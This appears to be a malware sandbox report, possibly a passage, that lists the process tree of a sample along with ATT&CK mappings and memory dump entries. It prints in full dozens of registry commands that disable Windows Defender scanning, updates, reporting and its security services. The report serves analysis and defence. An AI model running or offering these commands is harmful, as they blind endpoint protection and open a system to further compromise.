- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f"
  2⤵
  PID:6068
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
  2⤵
  PID:6140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:1572
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:6124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:6052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:6020
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:6112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f"
  2⤵
  PID:3548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /t REG_DWORD /d 1 /f"
  2⤵
  PID:2300
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /t REG_DWORD /d 0 /f"
  2⤵
  PID:3292
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /t REG_DWORD /d 10 /f"
  2⤵
  PID:6076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:6092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:5164
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f"
  2⤵
  PID:3276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f"
  2⤵
  PID:4404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /t REG_DWORD /d 1 /f"
  2⤵
  PID:5044
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /t REG_DWORD /d 1 /f"
  2⤵
  PID:4580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /t REG_DWORD /d 0 /f"
  2⤵
  PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /t REG_DWORD /d 0 /f"
  2⤵
  PID:1672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /t REG_DWORD /d 0 /f"
  2⤵
  PID:5184
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:4172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:4272
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:272
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:3968
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:2792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:1812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:3840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:5048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:6120
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:4892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:6100
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:2620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:4288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:2616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:1104
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:5096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:5092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4356

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "740980564-1409146772-933605648256815917971354486-7041590501249603870-1796474433"
1⤵
PID:2180

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-810590650-9621997-1318643647-76902159335344001-1740421179-1405093696-1169416784"
1⤵
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1312606308913435742-18894033291240639152-191706573910490766427009472361835106311"
1⤵
PID:1124

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1618513775-437617888-215439393-1463684725-985295609-30039182-848851792-2140607645"
1⤵
PID:1504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-171006006896838258-1052688211-39858048-8515739811782956641305774128-904766003"
1⤵
PID:2984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-77368935-1992668752052964838-423993723-781584794678784771-20630781331769283695"
1⤵
PID:2088

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "209389234010574209091068847655232967028-2047622819208962118416076039441216626914"
1⤵
PID:2916

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "253096887-2579579371069131362987698645-1705554341-700682474-1792990228-177636867"
1⤵
PID:3028

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-273689542-76398659169496644918382744521180972083-13084129571901163210-926594340"
1⤵
PID:2264

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1485890697642210593189070630-1259917257-1902847051-336611561278901850-1224016222"
1⤵
PID:3380

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1784929790-1838374057-147520645913863907201821949895-1937649688-874279673-1536774380"
1⤵
PID:2464

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-915770071890871418-25663286430109072-1481431050-1880882881-11428669311960427363"
1⤵
PID:3476

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2132767998-1788297329225444022-19895953571585470307-10604178711869249920-1679636149"
1⤵
PID:3728

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15943760994967966331934908529134208816619767007361639020371980666098-2019672140"
1⤵
PID:3724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "77175913719400625361945659284-2114512581-15882707031619325571571467093-877629991"
1⤵
PID:3748

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1617355167-9613260381294875883-2089616995710799142-247041589927439786120599648"
1⤵
PID:2272

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-38137974848782609150286682-1936184240167892930-971383991-4730840581967731684"
1⤵
PID:3488

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-747982753-9558934501835151421-1024680591403974703-1524957445-1102880978-289919693"
1⤵
PID:3492

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-21816228994247023-728343618330463154-973060470-672906883-5289380511339520153"
1⤵
PID:3628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "686831127-173109601785333610387986900-12292592182032203935-2057396554747971037"
1⤵
PID:2840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "154341130229321679-2028012406-1078016336-1786426436-1491568439614642459-2145534309"
1⤵
PID:1688

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-145034766212886715920615282221086396927-1765654527-963799624-1859204994359557621"
1⤵
PID:3608

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1258892594831630603-1760766199-1972087679-1344423148-523038197-1522755506-1144316498"
1⤵
PID:3784

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1088205636-1731299626991385216737605051691784784-788581700677753567-54251624"
1⤵
PID:3952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15975460371496036054938487772-2030913374-17905679231176722380399448914-1205943225"
1⤵
PID:3940

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19462498491668731137990837759-613887443524910938-1640689036-5885951692081723591"
1⤵
PID:1780

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1555471153-1852910064-1698833284-556037970-1610707893-1298900023952371055-1594573031"
1⤵
PID:2684

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "708666547-593240885629689712-52130864876590012159999513-1213163566-1879380246"
1⤵
PID:3696

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "144691499-949736753-746535533-1329120373-456749626-4435681219418551641639259913"
1⤵
PID:2676

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-166250564214827679421092404561492266453-959946627395898029-30834247868711868"
1⤵
PID:3496

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12872789431247244757-99567200329136840-1983704347-930133199-1803720158-557942789"
1⤵
PID:3392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2536-0-0x00000000749FE000-0x00000000749FF000-memory.dmp

Filesize
4KB

Download
memory/2536-1-0x0000000000920000-0x000000000094C000-memory.dmp

Filesize
176KB

Download
memory/2536-2-0x00000000749F0000-0x00000000750DE000-memory.dmp

Filesize
6.9MB

Download
memory/2536-3-0x00000000749F0000-0x00000000750DE000-memory.dmp

Filesize
6.9MB

Download
memory/2536-4-0x00000000749FE000-0x00000000749FF000-memory.dmp

Filesize
4KB

Download
memory/2536-5-0x00000000749F0000-0x00000000750DE000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads